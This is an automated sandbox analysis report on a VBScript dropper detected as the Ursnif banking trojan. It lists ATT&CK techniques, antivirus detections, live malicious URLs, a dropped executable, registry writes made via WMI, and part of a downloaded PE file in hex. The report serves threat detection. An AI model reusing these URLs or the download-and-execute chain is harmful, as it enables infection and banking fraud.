Loading ...

Play interactive tourEdit tour

Analysis Report Nuovo documento 1.vbs

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:222479
Start date:14.04.2020
Start time:19:50:05
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 5s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Nuovo documento 1.vbs
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:12
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.evad.winVBS@7/13@5/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 7.9% (good quality ratio 7.9%)
  • Quality average: 88.6%
  • Quality standard deviation: 20.2%
HCA Information:
  • Successful, ratio: 55%
  • Number of executed functions: 14
  • Number of non-executed functions: 30
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .vbs
Warnings:
Show All
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, dllhost.exe, ielowutil.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 2.20.160.163, 8.241.123.254, 8.253.207.120, 8.248.131.254, 67.27.157.126, 67.27.159.254, 104.82.137.153, 23.39.80.147
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, site-cdn.onenote.net.edgekey.net, e11290.dspg.akamaiedge.net, e5684.g.akamaiedge.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, go.microsoft.com.edgekey.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Ursnif
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation21Scheduled Task1Process Injection12Masquerading1Credential DumpingSystem Time Discovery1Remote File Copy12Data from Local SystemData Encrypted1Standard Cryptographic Protocol12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaScheduled Task1Port MonitorsScheduled Task1Software Packing23Network SniffingQuery Registry1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote File Copy12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesScripting21Accessibility FeaturesPath InterceptionVirtualization/Sandbox Evasion1Input CaptureVirtualization/Sandbox Evasion1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseExecution through API2System FirmwareDLL Search Order HijackingProcess Injection12Credentials in FilesProcess Discovery1Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol13SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationExploitation for Client Execution1Shortcut ModificationFile System Permissions WeaknessScripting21Account ManipulationAccount Discovery1Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceObfuscated Files or Information3Brute ForceSystem Owner/User Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskSoftware PackingTwo-Factor Authentication InterceptionSecurity Software Discovery121Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionIndicator BlockingBash HistoryRemote System Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess InjectionInput PromptFile and Directory Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationScriptingKeychainSystem Information Discovery14Taint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: http://primecontentstudios.com/pagigpy75.php?uid=Virustotal: Detection: 7%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeVirustotal: Detection: 35%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Nuovo documento 1.vbsVirustotal: Detection: 8%Perma Link
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeJoe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 4.2.PaintHelper.exe.1000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

Spreading:

barindex
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior

Networking:

barindex
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Apr 2020 17:51:21 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 224928Content-Disposition: attachment; filename=2_exx.binKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 da 47 9b 3d 9e 26 f5 6e 9e 26 f5 6e 9e 26 f5 6e b9 e0 88 6e 8f 26 f5 6e b9 e0 9b 6e 87 26 f5 6e b9 e0 98 6e d6 26 f5 6e 97 5e 66 6e 95 26 f5 6e 9e 26 f4 6e ed 26 f5 6e b9 e0 87 6e 9f 26 f5 6e b9 e0 89 6e 9f 26 f5 6e b9 e0 8d 6e 9f 26 f5 6e 52 69 63 68 9e 26 f5 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c3 9d 1f 46 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 a0 01 00 00 a0 01 00 00 00 00 00 7f 37 00 00 00 10 00 00 00 b0 01 00 00 00 00 01 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 10 00 00 1e ae 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 26 02 00 78 00 00 00 00 10 04 00 f6 6c 00 00 00 00 00 00 00 00 00 00 00 50 03 00 a0 1e 00 00 00 00 00 00 00 00 00 00 e0 b1 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 23 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 91 01 00 00 10 00 00 00 a0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b2 80 00 00 00 b0 01 00 00 90 00 00 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 24 c7 01 00 00 40 02 00 00 a0 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f6 6c 00 00 00 10 04 00 00 70 00 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Downloads filesShow sources
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\CJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /pagigpy75.php?uid= HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: SanAntonioHost: primecontentstudios.com
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: primecontentstudios.com
Urls found in memory or binary dataShow sources
Source: wscript.exe, 00000000.00000003.666214385.0000023B90BAE000.00000004.00000001.sdmp, PaintHelper.exe.0.drString found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r
Source: wscript.exe, 00000000.00000003.667075961.0000023B90C27000.00000004.00000001.sdmp, PaintHelper.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: wscript.exe, 00000000.00000003.666214385.0000023B90BAE000.00000004.00000001.sdmp, PaintHelper.exe.0.drString found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#
Source: wscript.exe, 00000000.00000003.667075961.0000023B90C27000.00000004.00000001.sdmp, PaintHelper.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: wscript.exe, 00000000.00000003.667075961.0000023B90C27000.00000004.00000001.sdmp, PaintHelper.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
Source: wscript.exe, 00000000.00000002.673338132.0000023B90B85000.00000004.00000001.sdmpString found in binary or memory: http://primecontentstudios.com/
Source: wscript.exe, 00000000.00000002.670523970.0000023B8E9BE000.00000004.00000001.sdmpString found in binary or memory: http://primecontentstudios.com/pagigpy75.php?uid=
Source: wscript.exe, 00000000.00000002.670330001.0000023B8E927000.00000004.00000001.sdmpString found in binary or memory: http://primecontentstudios.com/pagigpy75.php?uid=._o
Source: wscript.exe, 00000000.00000002.673338132.0000023B90B85000.00000004.00000001.sdmpString found in binary or memory: http://primecontentstudios.com/pagigpy75.php?uid==
Source: wscript.exe, 00000000.00000002.670523970.0000023B8E9BE000.00000004.00000001.sdmpString found in binary or memory: http://primecontentstudios.com/pagigpy75.php?uid=WW
Source: wscript.exe, 00000000.00000002.670330001.0000023B8E927000.00000004.00000001.sdmpString found in binary or memory: http://primecontentstudios.com/pagigpy75.php?uid=_______Set
Source: wscript.exe, 00000000.00000003.666214385.0000023B90BAE000.00000004.00000001.sdmp, PaintHelper.exe.0.drString found in binary or memory: https://sectigo.com/CPS0B
Source: wscript.exe, 00000000.00000003.667075961.0000023B90C27000.00000004.00000001.sdmp, PaintHelper.exe.0.drString found in binary or memory: https://sectigo.com/CPS0C
Source: PaintHelper.exe, 00000004.00000003.816245440.0000000003680000.00000004.00000040.sdmp, PaintHelper.exe, 00000004.00000002.948438071.0000000003680000.00000004.00000040.sdmpString found in binary or memory: https://trattoriafiori.xyz
Source: ~DF689278BECED51105.TMP.8.drString found in binary or memory: https://trattoriafiori.xyz/index.htm
Source: {1E5F6928-7EC4-11EA-AAE5-44C1B3FB757B}.dat.8.drString found in binary or memory: https://trattoriafiori.xyz/index.htm.xyz/index.htm
Source: PaintHelper.exe, 00000004.00000002.948438071.0000000003680000.00000004.00000040.sdmpString found in binary or memory: https://trattoriafiori.xyz/index.htmL2
Source: {1E5F6928-7EC4-11EA-AAE5-44C1B3FB757B}.dat.8.drString found in binary or memory: https://trattoriafiori.xyz/index.htmRoot
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.816245440.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.813307095.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.948438071.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.809341649.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.808887290.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.811481573.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.813893691.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815804460.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.810469443.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814479003.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815608534.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815133508.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.812630162.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.810128066.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.812144693.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816907657.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814943723.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815313978.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.811173075.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816721090.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.809743965.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815968516.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814703114.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.811803755.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816108974.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.810838452.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.812995480.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816495823.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814184398.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.808312503.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816635881.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816822684.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.813595381.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: PaintHelper.exe PID: 4192, type: MEMORY

E-Banking Fraud:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.816245440.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.813307095.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.948438071.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.809341649.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.808887290.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.811481573.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.813893691.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815804460.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.810469443.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814479003.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815608534.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815133508.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.812630162.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.810128066.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.812144693.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816907657.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814943723.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815313978.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.811173075.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816721090.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.809743965.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815968516.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814703114.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.811803755.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816108974.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.810838452.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.812995480.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816495823.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814184398.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.808312503.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816635881.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816822684.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.813595381.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: PaintHelper.exe PID: 4192, type: MEMORY

System Summary:

barindex
Writes or reads registry keys via WMIShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMIShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functionsShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_01001EB5 NtQueryVirtualMemory,4_2_01001EB5
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_001E4498 NtOpenProcessToken,memcpy,NtClose,RtlNtStatusToDosError,4_2_001E4498
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_001E12AF RtlInitUnicodeString,NtCreateKey,4_2_001E12AF
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_001E1CCC RtlInitUnicodeString,NtSetValueKey,NtDeleteValueKey,NtClose,RtlNtStatusToDosError,4_2_001E1CCC
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_001E1D96 memcpy,memcpy,lstrcatW,CreateEventA,_wcsupr,lstrlenW,NtQueryInformationProcess,CloseHandle,4_2_001E1D96
Detected potential crypto functionShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_01001C944_2_01001C94
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_001EAB9A4_2_001EAB9A
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_001EB3F04_2_001EB3F0
Java / VBScript file with very long strings (likely obfuscated code)Show sources
Source: Nuovo documento 1.vbsInitial sample: Strings found which are bigger than 50
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)Show sources
Source: PaintHelper.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.evad.winVBS@7/13@5/2
Creates files inside the user directoryShow sources
Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\ActiveJump to behavior
Creates temporary filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\PaintHelper.exeJump to behavior
Executes visual basic scriptsShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Nuovo documento 1.vbs'
Reads ini filesShow sources
Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: Nuovo documento 1.vbsVirustotal: Detection: 8%
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Nuovo documento 1.vbs'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\PaintHelper.exe C:\Users\user\AppData\Local\Temp\PaintHelper.exe
Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
